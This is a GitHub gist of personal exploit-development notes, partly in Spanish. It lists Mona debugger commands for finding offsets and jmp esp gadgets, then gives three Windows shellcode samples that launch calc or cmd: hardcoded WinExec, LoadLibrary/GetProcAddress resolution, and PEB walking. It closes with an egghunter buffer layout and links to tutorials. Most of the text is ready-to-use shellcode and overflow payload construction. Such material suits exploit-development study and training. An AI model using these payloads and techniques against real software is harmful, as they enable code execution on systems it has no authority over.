Last active
February 22, 2021 10:06
-
-
Save adon90/19af7b7172e1fea600f01a7b2487bfba to your computer and use it in GitHub Desktop.
Exploiting Tricks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Mona tricks: | |
| --------------- | |
| !mona pc 1000 -> Launch exploit with pattern | |
| !mona findmsp -> autocalculate offset, ESP size..... | |
| No jmp esp in Exec Region (.text) but no DEP: | |
| !mona asm -s "jmp esp" | |
| !mona find -s "\xff\xe4" -m <module> | |
| ----------------- | |
| SHELLCODES | |
| 1. WinExec Hardcoded | |
| arwin kernel32 WinExec | |
| -------------------------- | |
| shellcode = ("\x33\xc0" | |
| "\x50" | |
| "\x68\x2E\x65\x78\x65" #.exe | |
| "\x68\x63\x61\x6C\x63" #calc | |
| "\x8B\xC4" | |
| "\x6A\x01" | |
| "\x50" | |
| "\xBB\xED\x2A\x86\x7C" # arwin extracted WinExec address | |
| "\xFF\xD3") | |
| ------------------------------------- | |
| http://www.fuzzysecurity.com/tutorials/expDev/6.html | |
| https://github.com/73696e65/windows-exploits/blob/master/arwin.exe | |
| 2. GetProcess Address + LoadLibrary (GetProcAddress(LoadLibraryA("kernel32.dll"), "WinExec")) | |
| Buscar los punteros en .rdata a GetProcAddress y LoadLibrary a partir del EntryPoint: | |
| Search For > Name in all Modules | |
| Buscar la direccion del puntero en Follow in Dump y usarla como puntero. | |
| ------------------------------------------------ | |
| shellcode = "\x31\xC9" # xor ecx,ecx | |
| shellcode += "\x51" # push ecx | |
| shellcode += "\x68\x2e\x64\x6c\x6c" # .dll | |
| shellcode += "\x68\x65\x6c\x33\x32" # el32 | |
| shellcode += "\x68\x6b\x65\x72\x6e" # kern | |
| shellcode += "\x54" # PUSH ESP | |
| shellcode += "\xff\x15\x7b\x1d\x80\x7c" # *LoadLibrary | |
| shellcode += "\x68\x78\x65\x63\x20" # xec | |
| shellcode += "\x68\x57\x69\x6e\x45" # wine | |
| shellcode += "\x54" # push esp | |
| shellcode += "\x50" # push eax (Retorno LoadLibrary Kernel32) | |
| shellcode += "\xff\x15\x40\xae\x80\x7c" # *GetProcessAddress | |
| shellcode += "\x31\xC9" # xor ecx,ecx | |
| shellcode += "\x51" # push ecx | |
| shellcode += "\x68\x2e\x65\x78\x65" #.exe | |
| shellcode += "\x68\x63\x61\x6c\x63" # calc | |
| shellcode += "\x54" # PUSH ESP | |
| shellcode += "\xff\xd0" # call eax (eax es el retorno de GetProcessAddress) | |
| ------------------------------------------------------ | |
| 3. WinExec extraída del PEB | |
| ---------------------------------------------------------- | |
| shellcode =("\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" | |
| "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" | |
| "\x77\x20\x8b\x3f\x80\x7e\x0c\x33" | |
| "\x75\xf2\x89\xc7\x03\x78\x3c\x8b" | |
| "\x57\x78\x01\xc2\x8b\x7a\x20\x01" | |
| "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" | |
| "\x45\x81\x3e\x43\x72\x65\x61\x75" | |
| "\xf2\x81\x7e\x08\x6f\x63\x65\x73" | |
| "\x75\xe9\x8b\x7a\x24\x01\xc7\x66" | |
| "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" | |
| "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" | |
| "\xb1\xff\x53\xe2\xfd" | |
| "\x68\x63\x6d\x64\x20" # payload (cmd ) | |
| "\x89\xe2\x52\x52\x53\x53" | |
| "\x53\x53\x53\x53\x52\x53\xff\xd7") | |
| --------------------------------------------------------- | |
| https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html | |
| https://govolution.wordpress.com/2015/02/07/one-for-all-null-free-windows-winexec-shellcode-tool-for-generating-payload/ | |
| Egghunter | |
| ------------ | |
| evil = "A" * (510-len(hunter)-50) + nops + hunter + "\x90" * 5 + jmp_esp + "\xE9\xC0\xFF\xFF\xFF" | |
| Important to put NOPS between the hunter and the JMP ESP. | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment